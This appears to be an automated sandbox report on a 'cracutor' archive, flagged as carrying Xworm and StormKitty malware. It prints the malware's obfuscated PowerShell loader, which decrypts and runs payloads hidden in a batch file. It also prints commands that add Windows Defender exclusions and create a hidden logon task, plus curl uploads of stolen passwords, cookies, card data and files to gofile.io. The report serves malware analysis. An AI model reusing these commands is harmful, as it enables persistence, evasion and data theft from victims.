Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2592 wrote to memory of 2532 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2532 wrote to memory of 3004 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 3004 wrote to memory of 2632 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\lua.xml"

C:\Program Files (x86)\Internet Explorer\iexplore.exe

"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome

C:\Program Files\Internet Explorer\IEXPLORE.EXE

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240426-en

Max time kernel

136s

Max time network

151s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.dll",#1

Network

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240221-en

Max time kernel

121s

Max time network

123s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2204 wrote to memory of 2200 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bGqAVpTkbyYHaVSHHBPmXa3kZNv3H8sCS4IjMuFm+Ow='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BbGL3tLWlvORK8IKqoYaHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SERoH=New-Object System.IO.MemoryStream(,$param_var); $uVeFk=New-Object System.IO.MemoryStream; $zXgAh=New-Object System.IO.Compression.GZipStream($SERoH, [IO.Compression.CompressionMode]::Decompress); $zXgAh.CopyTo($uVeFk); $zXgAh.Dispose(); $SERoH.Dispose(); $uVeFk.Dispose(); $uVeFk.ToArray();}function execute_function($param_var,$param2_var){ $REYPt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Drhro=$REYPt.EntryPoint; $Drhro.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat';$mZiIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat').Split([Environment]::NewLine);foreach ($dACJS in $mZiIG) { if ($dACJS.StartsWith(':: ')) { $tZasG=$dACJS.Substring(3); break; }}$payloads_var=[string[]]$tZasG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

N/A

Files

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

155s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\123.txt"

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\123.txt"

Network

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240508-en

Max time kernel

141s

Max time network

105s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Auto Execute\gg.txt"

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Auto Execute\gg.txt"

Network

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240426-en

Max time kernel

130s

Max time network

99s

Command Line

"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\lua.xml"

Signatures

N/A

Processes

C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE

"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\lua.xml"

Network

Files

memory/4512-0-0x00007FF96BA30000-0x00007FF96BA40000-memory.dmp

memory/4512-1-0x00007FF9ABA4D000-0x00007FF9ABA4E000-memory.dmp

memory/4512-2-0x00007FF9AB9B0000-0x00007FF9ABBA5000-memory.dmp

memory/4512-3-0x00007FF9AB9B0000-0x00007FF9ABBA5000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240508-en

Max time kernel

119s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe

"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"

Network

Files

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240426-en

Max time kernel

137s

Max time network

144s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\idcljz.exe C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A
Key created \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1416 wrote to memory of 4224 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4224 wrote to memory of 1252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4224 wrote to memory of 3088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3088 wrote to memory of 4520 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4520 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 928 wrote to memory of 4852 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
PID 928 wrote to memory of 3836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 928 wrote to memory of 3668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 928 wrote to memory of 4480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 928 wrote to memory of 4240 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 928 wrote to memory of 1392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\idcljz.exe
PID 1392 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Users\Admin\AppData\Local\Temp\idcljz.exe
PID 1476 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1544 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1476 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 628 wrote to memory of 3836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1476 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 4864 wrote to memory of 364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1476 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1544 wrote to memory of 1988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1476 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 2180 wrote to memory of 3904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1476 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 1252 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1476 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 2032 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1476 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 4692 wrote to memory of 1888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1476 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe
PID 2568 wrote to memory of 4160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1476 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe C:\Windows\system32\cmd.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bGqAVpTkbyYHaVSHHBPmXa3kZNv3H8sCS4IjMuFm+Ow='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BbGL3tLWlvORK8IKqoYaHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SERoH=New-Object System.IO.MemoryStream(,$param_var); $uVeFk=New-Object System.IO.MemoryStream; $zXgAh=New-Object System.IO.Compression.GZipStream($SERoH, [IO.Compression.CompressionMode]::Decompress); $zXgAh.CopyTo($uVeFk); $zXgAh.Dispose(); $SERoH.Dispose(); $uVeFk.Dispose(); $uVeFk.ToArray();}function execute_function($param_var,$param2_var){ $REYPt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Drhro=$REYPt.EntryPoint; $Drhro.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat';$mZiIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat').Split([Environment]::NewLine);foreach ($dACJS in $mZiIG) { if ($dACJS.StartsWith(':: ')) { $tZasG=$dACJS.Substring(3); break; }}$payloads_var=[string[]]$tZasG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function 
$payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_863_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_863.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_863.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_863.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bGqAVpTkbyYHaVSHHBPmXa3kZNv3H8sCS4IjMuFm+Ow='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BbGL3tLWlvORK8IKqoYaHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SERoH=New-Object System.IO.MemoryStream(,$param_var); $uVeFk=New-Object System.IO.MemoryStream; $zXgAh=New-Object System.IO.Compression.GZipStream($SERoH, [IO.Compression.CompressionMode]::Decompress); $zXgAh.CopyTo($uVeFk); $zXgAh.Dispose(); $SERoH.Dispose(); $uVeFk.Dispose(); $uVeFk.ToArray();}function execute_function($param_var,$param2_var){ $REYPt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Drhro=$REYPt.EntryPoint; $Drhro.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_863.bat';$mZiIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_863.bat').Split([Environment]::NewLine);foreach ($dACJS in $mZiIG) { if ($dACJS.StartsWith(':: ')) { $tZasG=$dACJS.Substring(3); break; }}$payloads_var=[string[]]$tZasG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe

"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'

C:\Users\Admin\AppData\Local\Temp\idcljz.exe

"C:\Users\Admin\AppData\Local\Temp\idcljz.exe"

C:\Users\Admin\AppData\Local\Temp\idcljz.exe

"C:\Users\Admin\AppData\Local\Temp\idcljz.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupGet.vsdm" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Desktop/BackupGet.vsdm" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupRestore.mpe" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Desktop/BackupRestore.mpe" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupSave.WTV" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Desktop/BackupSave.WTV" https://store9.gofile.io/uploadFile

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 scriptblox.com udp
US 104.26.4.195:443 scriptblox.com tcp
US 8.8.8.8:53 195.4.26.104.in-addr.arpa udp
US 8.8.8.8:53 publisher-misc.gl.at.ply.gg udp
US 147.185.221.17:58207 publisher-misc.gl.at.ply.gg tcp
US 8.8.8.8:53 17.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 51.38.43.18:443 api.gofile.io tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 18.43.38.51.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
